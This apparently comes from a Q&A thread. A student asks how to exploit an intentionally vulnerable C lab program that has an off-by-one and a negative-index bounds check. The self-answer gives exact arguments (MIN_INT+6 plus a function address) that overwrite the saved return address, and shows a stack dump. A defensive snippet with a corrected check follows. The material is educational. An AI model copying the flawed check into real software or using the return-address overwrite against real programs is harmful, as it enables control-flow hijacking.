-2

I have this code, which has some vulnerability, but I can't seem to exploit it.

For now, this is what I've noticed:

1) if argv[1] = 3 and argc = 3, then it overflows and writes argv[2] into the memory of array[3] in the "place_int_array" function.

2) if argv[1] < 0 and argc = 3, then argv[2] overrides memory at array[argv[1]].

3) we write argv[0] in the printf function, which can be exploited somehow (didn't manage to exploit it at all).

Here is the code. I've put some comments, hopefully it's readable.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int secretCode = 123;

void print_secret_code(){
    //TODO - call this from somewhere...
    printf("You get better at this stuff, ah?! Go get your treasure, the code is %d\n", secretCode);
}

                //  array,         3
void  fill_array(int array[], size_t len){
  unsigned int i;
  for (i = 0; i < len; i++){
    array[i] = i * 10;
    printf("array[i]: %d, i: %d\n", array[i], i);
  }
}

void place_int_array(int slot,int value){

  //buffer size = 3*4=12 bytes?
  int array[3];

  //sizeof(array)=4*SAFES ( = 12 here), sizeof(array[0]) = 4 ==> fill_array(array, 12/4=3)
  fill_array(array, sizeof(array)/sizeof(array[0]));

  //vuln - when slot = 3.
  if(slot>3) //we stop bad guys here
    printf("safe number is greater than 3, out of bounds.\n");
  else{
    //vuln?
    array[slot]=value; 
    printf("filled safe %d with %d.\n",slot,value);
  }
  return;
}

int main(int argc,char **argv){
  if(argc!=3){
    printf("Welcome to Alladin's magic cave!\n");
    printf("Enter the secret number into the right safe and get the treasure cave entrance code!\n");
    printf("syntax: %s [SAFE NUMBER] [SECRET NUMBER]\n",argv[0]);

    //TEMP TEMP - for debugging only
    printf("print_secret_code function = %p\n", print_secret_code);
  }
  else
                  //atoi("14s56")=>14, atoi("a14s56")=>0
    place_int_array(atoi(argv[1]), atoi(argv[2]));

  exit(0);
}

I expect to somehow manage to control the flow of the program to execute the "print_secret_code". I know how to find its address, just can't find a way to exploit the program such that it goes to that memory.

NOTE: I know how to debug and make it print the value of the variable. I'm asking how I can exploit the code itself to jump into that function.

Elyasaf755
  • 2,239
  • 18
  • 24
  • looks like a stack smashing vuln to me, for this negative numbers are needed in argv2. Perhaps try the address of print_secret_code in argv3 – Jasen May 05 '19 at 20:03
  • yea, it is an integer overflow apparently. I've tried passing arguments to argv[1] and argv[2] that are greater than the max size, and printed them out, but they won't overflow for some reason. Same for values less than the minimum value of int – Elyasaf755 May 06 '19 at 14:37
  • try values around -2^63 or -2^31 – Jasen May 06 '19 at 18:47
  • well, I've noticed that the return address of the place_int_array function in the stack is just 6 bytes away from the address of array in the stack (6 bytes above). So I've managed to override some addresses of the stack, but because the stack is in different addresses every time, I can't really calculate how negative argv[1] should be (it is somewhere around -2^31 though) such that it overrides the address of array[6] exactly. – Elyasaf755 May 07 '19 at 08:26
  • You have access to the source code so there is no point in exploiting anything. The number is 123. – Lundin May 07 '19 at 11:59
  • @Lundin I put that number in there, originally the code was like this: int secretCode = ###SAFE###; there is no way to know the actual number without exploiting the real program. – Elyasaf755 May 11 '19 at 20:28
  • @Elyasaf755 My point is, this is artificial with no relevance to the real world. You have the source code and you can't use this "exploit" unless you have it. And since you have the source, simply read it to find out the number. – Lundin May 13 '19 at 06:38

1 Answer

1

I've managed to solve this problem, but I don't understand something. Here it is:

Since it's an integer overflow problem, I wrote some code to print out the buffer. The beginning of the buffer is the address where array[0] is stored. Then, I started to pass MAX_INT and MIN_INT values to the program. I noticed that when I passed the MIN_INT value to argv[1], it overwrote the beginning of the buffer. So I passed the MIN_INT+1 value, and noticed that it overwrote the second address of the buffer. From there it was easy to solve. I found out that the saved eip is at the address of array[6], so I passed to argv[1] the decimal value of MIN_INT+6, and to argv[2] I passed the address of the "print_secret_code" function in decimal.

Here is the output:

[lab8_IntegerOverflow]$ ./aladdinSafe -2147483642 134514251 //run program and pass arguments
print_secret_code function = 0x804864b
place_int_array ret address: 0x80487fa
&array: 0xff9cb9c4
slot: -2147483642
&array[slot]: 0xff9cb9dc
Stack dump (stack at 0xff9cb9c4, len 30): 
0xff9cba38: 0xdbc70467
0xff9cba34: 0x5bc66076
0xff9cba30: 0x00000000
0xff9cba2c: 0x00000000
0xff9cba28: 0x00000000
0xff9cba24: 0xf775d000
0xff9cba20: 0x0804825c
0xff9cba1c: 0x0804a01c
0xff9cba18: 0xff9cba34
0xff9cba14: 0xff9cba94
0xff9cba10: 0x00000003
0xff9cba0c: 0xf7786cca
0xff9cba08: 0xff9cbaa4
0xff9cba04: 0xff9cba94
0xff9cba00: 0x00000003 (main first argument (argc))
0xff9cb9fc: 0xf75cbaf3 (main return address (saved eip))
0xff9cb9f8: 0x00000000
0xff9cb9f4: 0xf775d000
0xff9cb9f0: 0x08048810
0xff9cb9ec: 0xf775d000
0xff9cb9e8: 0x0804881b
0xff9cb9e4: 0x0804864b (second argument)
0xff9cb9e0: 0x80000006 (first argument)
0xff9cb9dc: 0x0804864b (place_int_array return address (saved eip))
0xff9cb9d8: 0xff9cb9f8 (saved ebp)
0xff9cb9d4: 0xf7799938
0xff9cb9d0: 0xff9cc5c3
0xff9cb9cc: 0x00000014 //address of array[2]
0xff9cb9c8: 0x0000000a //address of array[1]
0xff9cb9c4: 0x00000000 (beginning of buffer)//address of array[0]
filled safe -2147483642 with 134514251.
You get better at this stuff, ah?! Go get your treasure, the code is 10
Segmentation fault

You can see a detailed answer here: Different Int values for the same value?

which is a new topic of a new question I have about the solution.

Thanks a lot to all the helpers!

Elyasaf755
  • 2,239
  • 18
  • 24
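As an added illustration (not code from the question or the answer above), the following C program contrasts the slot>3 check from place_int_array with a correct range check, and also shows why the MIN_INT+6 index used in the answer resolves to the same byte offset as index 6 on the 32-bit build whose stack dump is shown. The function names and probe values are constructed for this example; the offset calculation assumes a 4-byte int and 32-bit address arithmetic.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The check the program in the question performs: it rejects only slots above 3,
 * so slot == 3 (one past the end of a 3-element array) and every negative slot pass. */
bool original_check_allows(int slot) {
    return !(slot > 3);
}

/* Corrected check: the index must be non-negative and strictly below the element
 * count. Testing the sign first avoids turning a negative slot into a huge size_t. */
bool bounds_check_allows(int slot, size_t len) {
    return slot >= 0 && (size_t)slot < len;
}

/* Byte offset from &array[0] that array[slot] resolves to when the address
 * arithmetic wraps modulo 2^32 (32-bit build, 4-byte int). Constructed to show why
 * INT_MIN + 6 lands on the same address as index 6, the saved return address. */
uint32_t wrapped_byte_offset_32(int slot) {
    return (uint32_t)slot * (uint32_t)sizeof(int);
}

/* Hardened counterpart of place_int_array (constructed): only writes inside the
 * array and reports whether the write happened. */
bool place_int_array_safe(int *array, size_t len, int slot, int value) {
    if (!bounds_check_allows(slot, len)) {
        printf("safe number %d is out of bounds (0..%zu).\n", slot, len - 1);
        return false;
    }
    array[slot] = value;
    printf("filled safe %d with %d.\n", slot, value);
    return true;
}

int main(void) {
    int safes[3] = {0, 10, 20};                 /* same contents as fill_array produces */
    int probes[] = {0, 2, 3, -1, -2147483642};  /* last value is the answer's INT_MIN+6 */
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        printf("slot %d: original check %s, corrected check %s, 32-bit offset +%u bytes\n",
               probes[i], original_check_allows(probes[i]) ? "allows" : "rejects",
               bounds_check_allows(probes[i], 3) ? "allows" : "rejects",
               wrapped_byte_offset_32(probes[i]));
        place_int_array_safe(safes, 3, probes[i], 123);
    }
    return 0;
}
```

On a 64-bit build the same negative index does not wrap back onto the saved return address, so the program only faults; the corrected check rejects it on either build.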